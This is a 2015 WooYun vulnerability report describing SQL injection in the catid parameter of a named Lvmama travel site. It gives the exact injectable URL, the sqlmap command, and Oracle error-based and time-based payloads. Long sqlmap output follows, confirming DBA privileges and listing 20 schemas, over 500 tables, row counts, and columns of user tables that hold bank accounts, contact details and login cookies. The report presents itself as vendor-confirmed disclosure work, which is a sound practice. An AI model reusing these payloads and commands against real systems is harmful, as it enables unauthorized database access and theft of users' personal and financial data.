驴妈妈旅游网某站某处存在SQL注入（DBA权限+20个库+400多用户+18个管理员+数万记录信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152911

漏洞标题：驴妈妈旅游网某站某处存在SQL注入（DBA权限+20个库+400多用户+18个管理员+数万记录信息）

漏洞作者：路人甲

提交时间：2015-11-09 09:09

修复时间：2015-12-24 17:58

公开时间：2015-12-24 17:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-09：细节已通知厂商并且等待厂商处理中
2015-11-09：厂商已经确认，细节仅向厂商公开
2015-11-19：细节向核心白帽子及相关领域专家公开
2015-11-29：细节向普通白帽子公开
2015-12-09：细节向实习白帽子公开
2015-12-24：细节向公众公开

简要描述：

突然看到公开的漏洞，有很多驴妈妈旅游网了，也来测试看看，什么都不懂！~~~
这个是要验证登录的么？或许不要登录就可以看到吧，既然如此，就测试测试！~~~

详细说明：

会有礼物送的么？
注入点：
http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700
catid存在注入，我们添加英文符号撇，会返回错误，疑似存在注入
在没有增加--level 3之前测试，catid存在注入，但是测试不出来，添加--level 3后，顺利出来了！~~~

sqlmap.py -u "http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700" --threads 10 --dbms "Oracle" --level 3 --current-user --current-db --is-dba

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: catid
    Type: error-based
    Title: Oracle error-based - Parameter replace
    Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT UPPER(XMLT
ype(CHR(60)||CHR(58)||CHR(113)||CHR(105)||CHR(109)||CHR(98)||CHR(113)||(SELECT (
CASE WHEN (1434=1434) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(98)
||CHR(108)||CHR(113)||CHR(62))) FROM DUAL)&orderby=3&minprice=100&maxprice=700
    Type: AND/OR time-based blind
    Title: Oracle time-based blind - Parameter replace
    Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT (CASE WHEN
 (7573=7573) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(100)||CHR(97)||CHR(120
),5) ELSE 7573 END) FROM DUAL)&orderby=3&minprice=100&maxprice=700
---
[01:35:19] [INFO] the back-end DBMS is Oracle
web application technology: Apache, JSP
back-end DBMS: Oracle
[01:35:19] [INFO] fetching current user
[01:35:19] [INFO] retrieved: SAAS14
current user:    'SAAS14'
[01:35:19] [INFO] fetching current database
[01:35:19] [INFO] resumed: SAAS14
[01:35:19] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SAAS14'
[01:35:19] [INFO] testing if current user is DBA
current user is DBA:    True
[01:50:25] [INFO] the SQL query used returns 20 entries
[01:50:25] [INFO] starting 10 threads
[01:50:25] [INFO] resumed: CTXSYS
[01:50:25] [INFO] resumed: DBSNMP
[01:50:25] [INFO] resumed: DMSYS
[01:50:25] [INFO] resumed: EXFSYS
[01:50:25] [INFO] resumed: MDSYS
[01:50:25] [INFO] resumed: OLAPSYS
[01:50:25] [INFO] resumed: ORDSYS
[01:50:25] [INFO] resumed: OUTLN
[01:50:25] [INFO] resumed: SAAS15
[01:50:25] [INFO] resumed: SAAS14
[01:50:25] [INFO] resumed: SAAS17
[01:50:25] [INFO] resumed: SAAS16
[01:50:25] [INFO] resumed: SAAS19
[01:50:25] [INFO] resumed: SAAS18
[01:50:25] [INFO] resumed: SYS
[01:50:25] [INFO] resumed: SYSMAN
[01:50:25] [INFO] resumed: SYSTEM
[01:50:25] [INFO] resumed: TSMSYS
[01:50:25] [INFO] resumed: WMSYS
[01:50:25] [INFO] resumed: XDB
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SAAS14
[*] SAAS15
[*] SAAS16
[*] SAAS17
[*] SAAS18
[*] SAAS19
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SAAS14
[502 tables]
+--------------------------------+
| AD_CONTENT                     |
| AD_PAGE                        |
| AD_SEAT                        |
| AD_SEAT_IMG                    |
| AD_SEAT_LINK                   |
| ALITRIP_HOTEL                  |
| ALITRIP_HOTEL_LOG              |
| ALITRIP_HOTEL_ORDER            |
| ALITRIP_HOTEL_ORDER_LOG        |
| ALITRIP_HOTEL_PRODUCT          |
| ALITRIP_HOTEL_PROD_LOG         |
| ALITRIP_HOTEL_PROD_SYNC_LOG    |
| ALITRIP_MENPIAO_LOG            |
| ALITRIP_MENPIAO_NEWLOG         |
| ALITRIP_MENPIAO_ORDER          |
| ALITRIP_MENPIAO_PRODUCT        |
| ALITRIP_MENPIAO_RECEIVE        |
| ALITRIP_ROOMTYPE               |
| B2B_CHANNEL_PRICE              |
| B2B_CHANNEL_PRICE_DAY          |
| B2B_DEALER                     |
| B2B_DEALER_DAY                 |
| B2B_DEALER_LOG                 |
| B2B_FREETRAVEL                 |
| B2B_GRADE_PRICE                |
| B2B_ORDER_REPORT               |
| B2B_PACKAGE                    |
| B2B_SQPRICE                    |
| B2B_SQPRICE_DETAIL             |
| B2B_TICKET                     |
| B2B_TICKET_2012                |
| B2B_TICKET_2013                |
| B2B_TICKET_AIRPORT             |
| B2B_TICKET_BD                  |
| B2B_TICKET_CHANGE              |
| B2B_TICKET_CHANGE_DETAIL       |
| B2B_TICKET_CODE                |
| B2B_TICKET_COND                |
| B2B_TICKET_CONFIRM_LOG         |
| B2B_TICKET_DETAIL              |
| B2B_TICKET_DETAIL_2012         |
| B2B_TICKET_DETAIL_2013         |
| B2B_TICKET_EX                  |
| B2B_TICKET_FINISH_LOG          |
| B2B_TICKET_HIS                 |
| B2B_TICKET_LOG                 |
| B2B_TICKET_PEOPLE              |
| B2B_TICKET_STARTINFO           |
| B2B_TICKET_TRAFFIC             |
| B2C_CHANNEL_PRICE              |
| B2C_TAOBAO_CONFIG              |
| B2C_TAOBAO_LOG                 |
| B2C_TAOBAO_NOTIFYRECEIVEMSG    |
| B2C_TAOBAO_ORDER               |
| B2C_TAOBAO_ORDER_LOG           |
| B2C_TAOBAO_PRODUCT             |
| BANK_CITYCODE                  |
| BILL_TO_UFSOFT                 |
| CM_CHANNEL_PRICE               |
| CM_ORDER_LOG                   |
| CM_PAY_BALANCE                 |
| CM_PAY_DRAWMONEY               |
| CM_PAY_DRAWMONEY_LOG           |
| CM_PAY_MONEY_LOG               |
| CM_PAY_ORDER_LOG               |
| CM_PROD_LOG                    |
| CM_SYNC_LOG                    |
| CM_SYNC_PROD_LOG               |
| CM_USER                        |
| CM_USER_INFO                   |
| CRUEL_CODE_CUST                |
| CRUEL_CODE_LIST                |
| CRUEL_CODE_LOG                 |
| CRUEL_CODE_MESSAGE             |
| CRUEL_CODE_POS                 |
| CRUEL_CODE_VERIFY              |
| CRUEL_EXP_CODE                 |
| CRUEL_EXP_LIST                 |
| CTRIPTICKET_ORDER_LOG          |
| CUSTVIEW_INFO                  |
| CUST_BALANCE_LOG               |
| CUST_INFO_GROUP_CHANNEL        |
| CUST_VIEW_INFO                 |
| DIY_MDD                        |
| DIY_MDD_TYPE                   |
| DIY_REL_MDD_PROD               |
| EXPCODE_DETAIL                 |
| EXPCODE_LIST                   |
| GROUP_INFO                     |
| GROUP_INFO_2ND                 |
| GROUP_INFO_DETAIL_2ND          |
| GROUP_INFO_ORDER               |
| GROUP_ORDER                    |
| GROUP_ORDER_PEOPLE             |
| GROUP_SET                      |
| GROUP_YY_ORDER                 |
| GROUP_YY_ORDER_COND            |
| GROUP_YY_ORDER_DETAIL          |
| GROUP_YY_ORDER_LOG             |
| GROUP_YY_ORDER_PEOPLE          |
| GRP_CHANNEL_PRICE              |
| GRP_GRADE_PRICE                |
| GRP_ORDER                      |
| GRP_ORDER_DETAIL               |
| GRP_TICKET                     |
| GRP_TICKET_PRICE               |
| HOTEL_PLAN                     |
| HOTEL_PLAN_PRICE               |
| HOTEL_PLAN_TYPE                |
| HOTEL_WEEKSHOW                 |
| IMP_CODE                       |
| IMP_CODE_DETAIL                |
| IMP_CODE_LIST                  |
| INFO_AIRPORT                   |
| INFO_AIRPORT_FLIGHT            |
| INFO_AIRPORT_NUM               |
| INFO_AIRPORT_NUM_LIST          |
| INFO_AIRPORT_PRICE             |
| INFO_AIRPORT_SEAT              |
| INFO_AUTO_PRICE                |
| INFO_CAR                       |
| INFO_CAR_TYPE                  |
| INFO_CATALOG                   |
| INFO_COMMENT                   |
| INFO_CONDS                     |
| INFO_CTRIPTICKET               |
| INFO_FREETRAVEL                |
| INFO_FREETRAVEL_TREE           |
| INFO_GROUP                     |
| INFO_GROUP_DETAIL              |
| INFO_HOTEL                     |
| INFO_HOTEL_NUM                 |
| INFO_HOTEL_PRICE               |
| INFO_HOTEL_SET                 |
| INFO_INSURANCE                 |
| INFO_INSURANCE_LOG             |
| INFO_INSURANCE_ORDER           |
| INFO_JD                        |
| INFO_MEITUAN                   |
| INFO_NEWS                      |
| INFO_NEWS_READLOG              |
| INFO_PLAN_PRICE                |
| INFO_PROD                      |
| INFO_QUNAR_CONFIG              |
| INFO_QUNAR_HOTEL               |
| INFO_QUNAR_VIEW                |
| INFO_TB_PRICE                  |
| INFO_TICKET                    |
| INFO_TICKET_CANCEL             |
| INFO_TICKET_COND               |
| INFO_TICKET_CUST               |
| INFO_TICKET_DETAIL             |
| INFO_TICKET_EX                 |
| INFO_TICKET_MAILTEMP           |
| INFO_TICKET_NUM                |
| INFO_TICKET_NUM_FOREX          |
| INFO_TICKET_PRICE              |
| INFO_TICKET_PRICE_FOREX        |
| INFO_TICKET_REL                |
| INFO_TICKET_RELAREA            |
| INFO_TICKET_RELCAT             |
| INFO_TICKET_RELVIEW            |
| INFO_TICKET_REL_CUST           |
| INFO_TOGO                      |
| INFO_TRAFFIC                   |
| INFO_TRAFFIC_NUM               |
| INFO_TRAFFIC_NUM_LIST          |
| INFO_TRAFFIC_PLACE             |
| INFO_TRAFFIC_PRICE             |
| INFO_TRAFFIC_SEAT              |
| INFO_TRAFFIC_STATION           |
| INFO_TRAFFIC_TIMES             |
| INFO_TRAVEL                    |
| INFO_TRAVEL_CYCLE              |
| INFO_TRAVEL_CYCLE_AUTO         |
| INFO_TRAVEL_JOURNEY            |
| INFO_TRAVEL_PRICE              |
| INFO_TRAVEL_SEAT               |
| INFO_TUNIU                     |
| INFO_VENUE                     |
| INFO_VENUE_NUM                 |
| INFO_VISA                      |
| INTERFACE_AILVTONG_LOG         |
| INTERFACE_AIZHAOPIAO_LOG       |
| INTERFACE_BEIZHU_LOG           |
| INTERFACE_CAIHUISHIJIE_LOG     |
| INTERFACE_CHANGLU_LOG          |
| INTERFACE_CHANGLV_LOG          |
| INTERFACE_CHANGYOUTONG_LOG     |
| INTERFACE_CTRIP_HOLIDAY        |
| INTERFACE_DADONGRT_LOG         |
| INTERFACE_DDRT_LOG             |
| INTERFACE_DIANPING_LOG         |
| INTERFACE_DMZH_LOG             |
| INTERFACE_DUMUQIAO_LOG         |
| INTERFACE_FURONGYUAN_LOG       |
| INTERFACE_FZG_BIZZONE          |
| INTERFACE_GLYD                 |
| INTERFACE_HKDISNEY_LOG         |
| INTERFACE_HOTEL                |
| INTERFACE_HOTEL_BE_PRODUCT     |
| INTERFACE_HOTEL_DDS_LOG        |
| INTERFACE_HOTEL_DDS_ORDER_LOG  |
| INTERFACE_HOTEL_JL             |
| INTERFACE_HOTEL_JL_LOG         |
| INTERFACE_HOTEL_JL_ORDER_LOG   |
| INTERFACE_HOTEL_LTJL_LOG       |
| INTERFACE_HOTEL_LTJL_ORDER_LOG |
| INTERFACE_HOTEL_LTJL_PRODUCT   |
| INTERFACE_HOTEL_LYY_ORDER_LOG  |
| INTERFACE_HOTEL_PRODUCT        |
| INTERFACE_HOTEL_XH_LOG         |
| INTERFACE_HOTEL_XH_ORDER_LOG   |
| INTERFACE_HOTEL_XH_PRODUCT     |
| INTERFACE_HUANQIU_LOG          |
| INTERFACE_HUANTAOYOU_LOG       |
| INTERFACE_HUAXIAPIAOLIAN_LOG   |
| INTERFACE_IHUIU_LOG            |
| INTERFACE_IMAGECO              |
| INTERFACE_IMAGECO_CUST         |
| INTERFACE_JD_CHANNEL_LOG       |
| INTERFACE_JD_COUPON_PWD        |
| INTERFACE_JIDIAOTONG_LOG       |
| INTERFACE_KUIYUAN_LOG          |
| INTERFACE_KUXIU_LOG            |
| INTERFACE_LEXIAOXIANG_LOG      |
| INTERFACE_LINE                 |
| INTERFACE_LINGNAN_LOG          |
| INTERFACE_LIULIUKA_LOG         |
| INTERFACE_LLK_CODE             |
| INTERFACE_LLK_CUST             |
| INTERFACE_LOG                  |
| INTERFACE_LONG                 |
| INTERFACE_LVMAMA_LOG           |
| INTERFACE_MAP                  |
| INTERFACE_MEITUAN_DETAIL       |
| INTERFACE_MEITUAN_LOG          |
| INTERFACE_MJLD_LOG             |
| INTERFACE_MOUNTWG_LOG          |
| INTERFACE_MTS                  |
| INTERFACE_MTS_LOG              |
| INTERFACE_PIAOFUTONG_LOG       |
| INTERFACE_PIAOGJ_LOG           |
| INTERFACE_PIAOGONGCHANG_LOG    |
| INTERFACE_PIAOWUBA_LOG         |
| INTERFACE_PIAOZHIJIA_LOG       |
| INTERFACE_PRICE_RULE           |
| INTERFACE_PROD_SYNC_LOG        |
| INTERFACE_QUNAR                |
| INTERFACE_QUNAR_HISTORY_LOG    |
| INTERFACE_QUNAR_HISTOY_LOG     |
| INTERFACE_QUNAR_HOLIDAY        |
| INTERFACE_QUNAR_HOLIDAY_LOG    |
| INTERFACE_QUNAR_HOTEL          |
| INTERFACE_QUNAR_HOTEL_LOG      |
| INTERFACE_QUNAR_INVOICE        |
| INTERFACE_QUNAR_LINE_LOG       |
| INTERFACE_QUNAR_LOG            |
| INTERFACE_QUNAR_MOVE           |
| INTERFACE_QUNAR_SUPPLIER_LOG   |
| INTERFACE_SHANHAIGUAN_LOG      |
| INTERFACE_SHOUKEYI_LOG         |
| INTERFACE_SXLY                 |
| INTERFACE_SYNC_LOG             |
| INTERFACE_TIANGUI_LOG          |
| INTERFACE_TIANKE_LOG           |
| INTERFACE_TICKET               |
| INTERFACE_TONGCHENG_LOG        |
| INTERFACE_TOURMART_LOG         |
| INTERFACE_TUNIU_LOG            |
| INTERFACE_VISITBEIJING_LOG     |
| INTERFACE_WEIXUN_LOG           |
| INTERFACE_WULONG_LOG           |
| INTERFACE_XIAONIREN_LOG        |
| INTERFACE_XIECHENG_LOG         |
| INTERFACE_XINAIMOKE_LOG        |
| INTERFACE_YANGGUANGLZ_LOG      |
| INTERFACE_YINLVTONG_LOG        |
| INTERFACE_YUANFAN_LOG          |
| INTERFACE_YYJQ_LOG             |
| INTERFACE_ZHONGJINGXIN_LOG     |
| JOURNEY                        |
| JOURNEY_COMMENT                |
| JOURNEY_DETAIL                 |
| JOURNEY_PRO_DETAIL             |
| LVMAMA_CHUANHUO_LOG            |
| LVMAMA_PRODUCT_INFO            |
| LVMAMA_PRODUCT_LIST            |
| LVMAMA_PUSH_LOG                |
| LVMAMA_UPDATE_FLAG             |
| LVMAMA_VIEW                    |
| LVMAMA_VIEW_INFO               |
| LVWUTONGCODE_QUEUE             |
| LVWUTONG_SMSMODE               |
| LVWUTONG_TMPCODE               |
| LVWUTONG_TMPCODE_GROUP         |
| LVWUTONG_TMPCODE_LOG           |
| LVWUTONG_TMPCODE_USE           |
| NANHU_DEPTSET                  |
| ONLINE_DEBUG_LOG               |
| ORDER_ABNORMAL_LOG             |
| ORDER_API_PAY                  |
| ORDER_CHANGE_LOG               |
| ORDER_LOG                      |
| ORDER_RELATION_LOG             |
| PAY_BALANCE                    |
| PAY_CREDIT_FEE                 |
| PAY_DRAWMONEY                  |
| PAY_MOMEY_LOG                  |
| PAY_ORDER_LOG                  |
| PLAN_TABLE                     |
| QUNAR_PRICE_CACHE              |
| RECE_APP                       |
| RECE_APP_DETAIL                |
| RECE_INVOICE                   |
| RECE_INVOICE_DETAIL            |
| RECE_PAYMENT_DETAIL            |
| RECE_PAYMENT_LIST              |
| RECE_STATEMENT_LIST            |
| RUPD$_B2B_SETTLE_METHOD        |
| RUPD$_B2B_TICKET               |
| RUPD$_B2B_TICKET_DETAIL        |
| RUPD$_HOTEL_BRAND              |
| RUPD$_HOTEL_DISTRICT           |
| RUPD$_HOTEL_INFO               |
| RUPD$_INFO_AREA                |
| RUPD$_INFO_AREA_EX             |
| RUPD$_INFO_BANK                |
| RUPD$_INFO_CAR                 |
| RUPD$_INFO_CONDS               |
| RUPD$_INFO_HOTEL               |
| RUPD$_INFO_NEWS                |
| RUPD$_INFO_PROD                |
| RUPD$_INFO_TICKET              |
| RUPD$_INFO_TICKET_CANCEL       |
| RUPD$_INFO_TICKET_COND         |
| RUPD$_INFO_TICKET_DETAIL       |
| RUPD$_INFO_TICKET_EX           |
| RUPD$_INFO_TICKET_PRICE        |
| RUPD$_INFO_TICKET_RELAREA      |
| RUPD$_INFO_TICKET_RELVIEW      |
| RUPD$_INFO_TRAVEL              |
| RUPD$_INFO_VISA                |
| RUPD$_INFO_VISA_SORT           |
| RUPD$_INTERFACE_LLK_CUST       |
| RUPD$_SAAS_PERMISSION          |
| RUPD$_SAAS_USER_INFO           |
| RUPD$_TB_USR_INFO              |
| RUPD$_TB_VIEW_INFO             |
| RUPD$_USR_TAG                  |
| RUPD$_USR_VIEW                 |
| SAAS_AREA_SUB                  |
| SAAS_BUY_LOG                   |
| SAAS_CLUSTER                   |
| SAAS_DATAMAN                   |
| SAAS_INFO_AREA                 |
| SAAS_INFO_SUB                  |
| SAAS_NEWS                      |
| SAAS_NEWS_SORT                 |
| SAAS_NOTICE                    |
| SAAS_ORDER_SOURCE              |
| SAAS_PAY_DRAWMONEY             |
| SAAS_PAY_DRAWMONEY_LOG         |
| SAAS_PAY_PRODUCT_TYPE          |
| SAAS_PAY_SERVICE               |
| SAAS_TABLE_SQL                 |
| SAAS_VAP_ORDER                 |
| SAAS_VAP_PRODUCT               |
| SAAS_VIEW_SUB                  |
| SETTLE_ACCOUNT                 |
| SETTLE_PAYABLE                 |
| SETTLE_PAYABLE_DETAIL          |
| SETTLE_PAYABLE_LIST            |
| SETTLE_PAYAPP                  |
| SETTLE_PAYAPP_DETAIL           |
| SETTLE_STATEMENT_DETAIL        |
| SETTLE_STATEMENT_LIST          |
| SITE_IP2                       |
| SMS_CONSUME_LOG                |
| SMS_GETMONEY_LOG               |
| STOCK_ADD_LOG                  |
| STOCK_REPORT_DAY               |
| SYS_CURRENCY_RATE              |
| SYS_FEE_LOG                    |
| SYS_REFER                      |
| SYS_REPORT_DAY                 |
| SYS_SMS_LOG                    |
| SYS_SQL_HISTORY                |
| SYS_SQL_QUEUE                  |
| TB_CONSUME_CODE                |
| TB_RECEIVE_LOG                 |
| TEST_DB                        |
| TOUREASY_AREA                  |
| TOUREASY_LINE                  |
| TOUREASY_ORDER_INFO_PINGZHENG  |
| TOUREASY_ORDER_QUEUE           |
| TOUREASY_PRODUCT               |
| TOUREASY_USR_LOG               |
| TOUR_GUIDE                     |
| TRAFFIC_TO_TICKET              |
| T_EQUIP                        |
| T_EQUIPSUB                     |
| T_LANDMARK                     |
| T_MATERIA                      |
| T_PRO_COMMON_NUM               |
| T_PRO_COMMON_PRICE             |
| T_PRO_DETAIL_COURSE            |
| T_REGIONS                      |
| T_REGIONS_QD                   |
| T_REGIONS_SUBWAY               |
| T_SPORTTYPE                    |
| T_VENUE                        |
| T_VENUE_COUNT                  |
| T_VENUE_PRICE                  |
| T_VENUE_RECORD                 |
| T_VENUE_SUB                    |
| UF_SOFT_QUEUE                  |
| UF_SOFT_SETTLE_PAYABLE         |
| UF_SOFT_USR_CREDIT_LOG         |
| UNIONPAY_CONFIG                |
| UNIONPAY_TRADE_LOG             |
| UPDATE_FOREXPRICE_LOG          |
| USR_ACCOUNT                    |
| USR_ACCOUNT_LOG                |
| USR_ACCOUNT_SET                |
| USR_ATTENTION                  |
| USR_BALANCE_LOG                |
| USR_BOOK                       |
| USR_CHECKIN_TYPE               |
| USR_CREDIT                     |
| USR_CREDIT_LOG                 |
| USR_DEALER                     |
| USR_DEPT                       |
| USR_DIST                       |
| USR_DOCUMENT_TEMP              |
| USR_ENTERPRISE_TAG             |
| USR_GETPASS_LOG                |
| USR_GRADE                      |
| USR_HOTEL_COND                 |
| USR_INFO                       |
| USR_INFO_B2C                   |
| USR_INFO_EXPRESS               |
| USR_INTERFACE                  |
| USR_INTERFACE_INFO             |
| USR_LOG                        |
| USR_LOGIN                      |
| USR_LOGIN_LOG                  |
| USR_LOG_2011                   |
| USR_LOG_2012                   |
| USR_LOG_2013                   |
| USR_MAILTEMP_LIST              |
| USR_MANAGER_USER               |
| USR_MEMBER                     |
| USR_MENU                       |
| USR_MSG                        |
| USR_MSG_COMMENT                |
| USR_MSG_MONEY                  |
| USR_PAGES                      |
| USR_POWER_AREA                 |
| USR_PRINT_TEMP                 |
| USR_PROD_CODE                  |
| USR_PROD_WHILE_AREA            |
| USR_PROD_WHILE_DETAIL          |
| USR_PROD_WHILE_GROUP           |
| USR_PROD_WHILE_LIST            |
| USR_PROD_WHILE_TREE            |
| USR_SCORE                      |
| USR_SCORE_DETAIL               |
| USR_SCORE_LOG                  |
| USR_SCORE_RULE                 |
| USR_VIEW_BAK                   |
| USR_VIEW_BOUNTY                |
| USR_VIEW_COLUMN                |
| USR_VIEW_COPY                  |
| USR_VIEW_LINK                  |
| USR_VIEW_MSG                   |
| USR_VIEW_MSG_HIS               |
| USR_VIEW_NAV                   |
| USR_VIEW_PAGE                  |
| USR_VIEW_TEMPLATE              |
| WX_AD                          |
| WX_AD_DETAIL                   |
| WX_AD_SEND_LOG                 |
| WX_COUPON_SCEEN                |
| WX_COUPON_SEND_LOG             |
| WX_KEY                         |
| WX_MSG                         |
| WX_MSG_TEMP                    |
| WX_ORDER_TASK                  |
| WX_SCENE                       |
| WX_SCENE_IN                    |
| WX_SCENE_LOG                   |
| WX_SEND_HISTORY                |
| WX_SEND_QUEUE                  |
| WX_SET                         |
| WX_TREE                        |
| WX_USER_INFO                   |
| XIECHENG_HOTEL_INFO            |
| XIECHENG_HOTEL_LOG             |
| XIECHENG_HOTEL_ORDER           |
| XIECHENG_HOTEL_STATE           |
| INTERFACE_KUIYUAN_LOG          |
+--------------------------------+
Database: SAAS14
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| LVMAMA_PUSH_LOG         | 2502247 |
| LVMAMA_VIEW             | 69067   |
| USR_LOG                 | 56983   |
| CM_ORDER_LOG            | 49229   |
| B2B_TICKET_PEOPLE       | 32502   |
| PAY_ORDER_LOG           | 29363   |
| B2B_TICKET              | 27955   |
| B2B_TICKET_DETAIL       | 27955   |
| B2B_TICKET_EX           | 27926   |
| CM_SYNC_LOG             | 27562   |
| INTERFACE_LVMAMA_LOG    | 25698   |
| LVMAMA_PRODUCT_LIST     | 23209   |
| INFO_TICKET             | 23208   |
| ORDER_LOG               | 22026   |
| INFO_TICKET_RELVIEW     | 16473   |
| LVMAMA_CHUANHUO_LOG     | 14566   |
| USR_LOGIN_LOG           | 11318   |
| PAY_BALANCE             | 3750    |
| PAY_MOMEY_LOG           | 2669    |
| B2B_TICKET_CHANGE       | 1306    |
| CM_SYNC_PROD_LOG        | 856     |
| B2B_CHANNEL_PRICE       | 626     |
| LVMAMA_VIEW_INFO        | 610     |
| INFO_TICKET_NUM         | 559     |
| USR_LOGIN               | 431     |
| INFO_TICKET_CUST        | 415     |
| B2B_CHANNEL_PRICE_DAY   | 382     |
| USR_INFO                | 377     |
| USR_CREDIT_LOG          | 369     |
| WX_SCENE_LOG            | 308     |
| USR_GETPASS_LOG         | 208     |
| INFO_TICKET_EX          | 136     |
| LVMAMA_PRODUCT_INFO     | 72      |
| USR_ATTENTION           | 65      |
| ORDER_ABNORMAL_LOG      | 50      |
| WX_USER_INFO            | 45      |
| USR_INFO_B2C            | 44      |
| USR_INTERFACE_INFO      | 41      |
| WX_AD_DETAIL            | 23      |
| USR_MEMBER              | 18      |
| INFO_TICKET_PRICE       | 6       |
| WX_AD                   | 5       |
| USR_CREDIT              | 4       |
| WX_AD_SEND_LOG          | 4       |
| WX_MSG_TEMP             | 2       |
| CUST_INFO_GROUP_CHANNEL | 1       |
| INFO_CONDS              | 1       |
| INFO_TICKET_CANCEL      | 1       |
| INTERFACE_XIECHENG_LOG  | 1       |
| LVMAMA_UPDATE_FLAG      | 1       |
| SAAS_DATAMAN            | 1       |
| USR_DOCUMENT_TEMP       | 1       |
| USR_INFO_EXPRESS        | 1       |
+-------------------------+---------+
Database: SAAS14
Table: USR_LOG
[7 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| CUST_ID        | NUMBER   |
| LOG_DATE       | DATE     |
| LOG_DESC       | VARCHAR2 |
| LOG_NUM        | VARCHAR2 |
| LOG_TYPE       | NUMBER   |
| PARENT_CUST_ID | NUMBER   |
| USER_ID        | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_LOGIN_LOG
[7 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| COOKIEID       | VARCHAR2 |
| CUST_ID        | NUMBER   |
| IP             | VARCHAR2 |
| LOGIN_DATE     | DATE     |
| LOGIN_TYPE     | NUMBER   |
| PARENT_CUST_ID | NUMBER   |
| USER_ID        | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_INFO_EXPRESS
[9 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| ACCOUNT_NO     | VARCHAR2 |
| CUST_ID        | NUMBER   |
| FROM_ADDRESS   | VARCHAR2 |
| FROM_COM       | VARCHAR2 |
| FROM_MAN       | VARCHAR2 |
| FROM_TEL       | VARCHAR2 |
| PARENT_CUST_ID | NUMBER   |
| SHIP_INFO      | VARCHAR2 |
| UPDATE_DATE    | DATE     |
+----------------+----------+
Database: SAAS14
Table: USR_CREDIT
[8 columns]
+----------------+--------+
| Column         | Type   |
+----------------+--------+
| ALL_CREDIT_NUM | NUMBER |
| CREATE_DATE    | DATE   |
| CREDIT_CUST_ID | NUMBER |
| CREDIT_NUM     | NUMBER |
| CREDIT_TYPE    | NUMBER |
| CUST_ID        | NUMBER |
| ID             | NUMBER |
| USE_CREDIT_NUM | NUMBER |
+----------------+--------+
Database: SAAS14
Table: USR_INFO
[95 columns]
+---------------------+----------+
| Column              | Type     |
+---------------------+----------+
| KEY                 | VARCHAR2 |
| ACCOUNT             | VARCHAR2 |
| ACCOUNT_NAME        | VARCHAR2 |
| AGREEMENT_DATE      | DATE     |
| AGREEMENT_IP        | VARCHAR2 |
| AGREEMENT_USER      | VARCHAR2 |
| ANDROID_UID         | VARCHAR2 |
| AREA_ID             | NUMBER   |
| ATTENT_COUNT        | NUMBER   |
| BANK_ACCOUNT_NAME   | VARCHAR2 |
| BANK_ACCOUNT_NO     | VARCHAR2 |
| BANK_CITY           | VARCHAR2 |
| BANK_CITYCODE       | VARCHAR2 |
| BANK_NAME           | VARCHAR2 |
| BANK_PROVINCE       | VARCHAR2 |
| BANK_TYPE           | VARCHAR2 |
| BEIANHAO            | VARCHAR2 |
| CHECK_PRINT_NUM     | NUMBER   |
| CHECK_PRINT_PRICE   | VARCHAR2 |
| CONTRACT_END_DATE   | DATE     |
| CONTRACT_PERSON     | VARCHAR2 |
| CONTRACT_START_DATE | DATE     |
| CURRENCY_TYPE       | NUMBER   |
| CUST_CODE           | VARCHAR2 |
| CUST_DESC           | CLOB     |
| CUST_GAT_FEE        | NUMBER   |
| CUST_GAT_LIMIT      | NUMBER   |
| CUST_GRADE          | NUMBER   |
| CUST_ID             | NUMBER   |
| CUST_NAME           | VARCHAR2 |
| CUST_PAY_FEE        | NUMBER   |
| CUST_TYPE           | NUMBER   |
| CUST_WEBSITE        | VARCHAR2 |
| DEPOSIT             | NUMBER   |
| DYCON               | VARCHAR2 |
| DYSHOW              | NUMBER   |
| FEE                 | NUMBER   |
| GET_MONEY_MODE      | NUMBER   |
| INTERFACE_PAY_TYPE  | NUMBER   |
| IS_B2B              | NUMBER   |
| IS_CHECK            | NUMBER   |
| IS_CHECK_VALUES     | VARCHAR2 |
| IS_CONFIRM_ORDER    | NUMBER   |
| IS_DISCOUNT         | NUMBER   |
| IS_GAT_MONEY        | NUMBER   |
| IS_GROUP            | NUMBER   |
| IS_POST             | NUMBER   |
| IS_PRODMANAGER      | NUMBER   |
| IS_SAAS             | NUMBER   |
| IS_SENDSMS          | NUMBER   |
| IS_WHILE            | NUMBER   |
| LAST_IP             | VARCHAR2 |
| LINK_ADDRESS        | VARCHAR2 |
| LINK_EMAIL          | VARCHAR2 |
| LINK_FAX            | VARCHAR2 |
| LINK_MOBILE         | VARCHAR2 |
| LINK_NAME           | VARCHAR2 |
| LINK_PHONE          | VARCHAR2 |
| LINK_QQ             | VARCHAR2 |
| LINK_SOURCE         | VARCHAR2 |
| LOGIN_COUNT         | NUMBER   |
| LOGO                | VARCHAR2 |
| MANAGER_MEMO        | CLOB     |
| ORDER_COUNT         | NUMBER   |
| ORDER_CUST_POWER    | NUMBER   |
| ORDER_MONEY         | NUMBER   |
